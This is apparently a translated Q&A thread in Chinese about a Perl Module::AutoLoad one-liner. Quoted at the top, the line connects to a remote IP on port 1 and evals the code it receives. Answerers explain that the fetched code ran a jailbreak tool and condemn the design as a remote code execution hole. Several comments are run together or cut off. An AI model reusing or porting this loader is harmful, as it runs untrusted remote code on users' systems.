use lib do{eval<$b>&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"};
这段代码似乎导入了一个库,但是我不知道 botstrap 是如何工作的。
有人可以解释一下吗?因为我想将其移植到Python中。
botstrap是Module::AutoLoad模块的一部分,是一个私有子程序。整个语句应该被无条件地加入您的代码中。
这个模块的想法是在不需要操作员干预的情况下安装代码所需的任何模块。我建议这是一个可怕的想法,你应该确保你的Python代码引用的所有内容都已经按照通常的方式进行了安装。
http://R.cX:1/的内容,甚至那都是混淆的。所有这些都违背了开源的理念,在生产代码中称之为“模块”是非常疯狂的,原因有很多。 - Borodinhttp://r.cx:1/下载的代码使用eval访问http://ww.limera1n.com/并执行iJailBreak,这是一个iPhone解锁程序。这与安装缺失的Perl模块无关,而且功能非常恶劣。可能是因为网站http://r.cx已被黑客攻击,但毫无疑问,这个模块不应该出现在CPAN上。 - Borodineval。 - ThisSuitIsBlackNot我现在戴上我的安全帽,对这个模块的整体设计以及特别是测试套件进行评价。
一次又一次地,我们都警告人们不要使用curl | bash,因为这是一个极其愚蠢的做法。一个人永远不应该仅仅执行一个位于URL远端、他无法掌控、通常可在互联网上访问的东西,并希望一切都会没事。
然而,这个模块被撤下来的原因不是因为它这样做了——尽管我认为,实现一个安全漏洞作为模块的基本想法本身就是一个可怕的想法——而是因为以下所有原因:
更新:我已经直接与作者交谈,他似乎愿意做出正确的行动,并将采纳我的建议:将其移至Acme,更改测试以使用本地HTTP服务器而非外部服务器,并在模块操作之前要求设置环境变量I_KNOW_THIS_IS_A_REMOTE_CODE_EXECUTION_VULNERABILITY_AND_I_AM_WILLING_TO_RISK_MY_JOB_AND_COMPANY为真值。
[1] CPAN使用Acme命名空间作为放置有趣/无意义等模块的地方。
perl -le'print 82.46.99.88'显示它对应于R.cX。 - ThisSuitIsBlackNot